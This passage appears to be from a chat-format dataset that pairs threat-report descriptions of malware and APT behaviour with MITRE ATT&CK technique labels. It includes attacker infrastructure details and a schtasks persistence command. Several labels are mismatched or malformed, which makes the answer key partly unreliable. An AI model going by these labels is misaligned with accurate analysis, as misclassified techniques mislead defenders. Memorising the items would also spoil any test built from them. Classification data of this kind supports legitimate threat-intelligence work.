- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve can identify and search removable drives for specific file name extensions."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. Finally, REvil terminates execution"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL: http://ink[dot]inkboom.co.kr/host/img/jpg/post.php HTTP data/parameters used in the request include: Content-Type: multipart/form-data; boundary=—-WebKitFormBoundar ywhpFxMBe19cSjFnG User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322) Accept-Language: en-us HTTP Version: HTTP/1.0 The malware can also download and execute additional components served to it by the control server"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1048 - Exfiltration Over Alternative Protocol', 'T1132 - Data Encoding', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The .zip archive attached to the email contains a Windows shortcut (.lnk) file with the Microsoft Internet Explorer logo"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a module that captures screenshots of the victim's desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYMARBLE has a command to search for files on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can exfiltrate collected data to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1497.003 - Time Based Evasion', 'T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT has an audio capture and eavesdropping module."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the user clicks on the fake Adobe Flash Player installer, it will extract/create the following malicious payload into the Startup directory to maintain its persistence:"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed. This is an undocumented behavior in Microsoft Windows"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie uses Rundll32 to load a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkVishnya used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The decoy file, doc.rtf, contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP%"
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants of achieve persistence by registering the payload as a Shell Icon Overlay handler COM object."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors encoded some payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key; other payloads were Base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT has modified the Windows firewall to allow itself to communicate through the firewall."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913. The malware sends the SOCKS5 connection request \"05 01 00\" and verifies the server response starts with \"05 00\". The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order"
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DHS and FBI recommend that network administrators review the IP addresses, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization.When reviewing network perimeter logs for the IP addresses, organizations may find numerous instances of these IP addresses attempting to connect to their systems"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole determines a working directory where it stores all the gathered data about the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has encrypted it's main payload using 3DES."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth can use HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used ProcDump to dump credentials from memory."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used macros to execute PowerShell scripts to download malware on victim's machines. It has also used PowerShell to execute commands and move laterally through a victim network."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware xxmm contains a UAC bypass tool for privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak may use netsh to add local firewall rule exceptions."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has conducted widespread scanning to identify public-facing systems vulnerable to Log4j (CVE-2021-44228)."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A JHUHUGIT variant gathers network interface card information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The use of large size files to avoid detection by security solutions with hardcoded size limits for ‘efficiency’. - A fishing-with-dynamite approach to collecting initial access to victims with low-cost tooling"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "build_downer has the ability to download files from C2 to the infected host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes can capture screenshots of the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note: aswrundll.exe is very similar to Microsoft’s own rundll32.exe - it allows you to execute DLLs by calling their exported functions"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz to obtain credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adds persistence on the system by creating a shortcut in the user’s Startup folder with the correct cmdline arguments"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used Visual Basic 6 (VB6) payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can be controlled via a custom C2 protocol over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several of the tools are freely-available Windows utilities, such as Amplia Security’s Windows Credential Editor. We also found a nearly complete set of the Microsoft SysInternals PsTools package, a copy of NLBrute (which attempts to brute-force passwords), installers for the commercial TeamViewer and AnyDesk remote support tools, and a number of utilities created by endpoint security vendors that are designed to remove their (and other companies’) endpoint security and antivirus tools from a computer."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has used ps to list processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the documents spreads what analysts are calling SQLRat, previously unseen malware that drops files and executes SQL scripts on the host system. The use of SQL scripts is ingenious in that they don’t leave artifacts behind the way traditional malware does. Once they are deleted by the attackers’ code, there is nothing left to be forensically recovered. This technique has not been observed in previous campaigns associated with FIN7"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore changes the permissions of a payload using the command \"chmod -R 755\"."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca used the command \"schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has the ability to identify specific files and directories that are not to be encrypted."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The encrypted file names are appended with a string of random characters as the new extension. For example, it renames a file named “My_files.zip” to “My_files.zip.IAsnM”, “My_files2.zip” to “My_files2.zip.WZlF” and so on. Also, the threat actor creates the “RECOVER-FILES.txt” with ransom note in all folders that contain encrypted files, as shown in the figure below"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has opened the registry and performed query searches."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill has several VBS scripts used throughout the malware's lifecycle."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Helminth executable is able to communicate with its C2 server via HTTP and via DNS queries in very similar ways to the Helminth script variant. In fact, the DNS beacons follow the same structure and sequence as the script variant of Helminth discussed in the previous section"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component can list directory contents."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has obtained passwords and session tokens with the use of the Redline password stealer."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Check for blocklisted usernames and computernames: The implant concatenates the username and computer it acquires from the infected endpoint's environment variables. This string is then checked against a list of blocklisted values to determine if the implant should continue execution or exit out. Check for blocklisted process names: The following process names are blocklisted and if found running on the system, the RAT implant will simply exit. The blocklist consists of processes belonging to Virtual Machine software (such as VMWare) and analysis tools (such as ProcessHacker etc"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1057 - Process Discovery', 'T1082 - System Information Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "down_new has the ability to identify the system volume information of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet can open an active screen of the victim’s machine and take control of the mouse and keyboard."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the event this is successful, the malware will use the following path to store any dropped files: %COMMONPROGRAMFILES%\\services\\ In the event it is not successful, this alternative path will be used instead: %APPDATA%\\microsoft\\mmc\\ Reaver.v2 proceeds to decrypt an embedded file using a simple XOR obfuscation routine"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can execute PowerShell commands and has used PowerShell to execute a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ajax Security Team has used personalized spearphishing attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, Grandoreiro detects two virtual environments – VMWare via its special I/O port and Virtual PC via the vpcext instruction"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has retrieved iPhone text messages from iTunes phone backup files."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sideloading happens after the steps described earlier — the threat actor successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and c0000012.log."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DealersChoice uses HTTP for communication with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
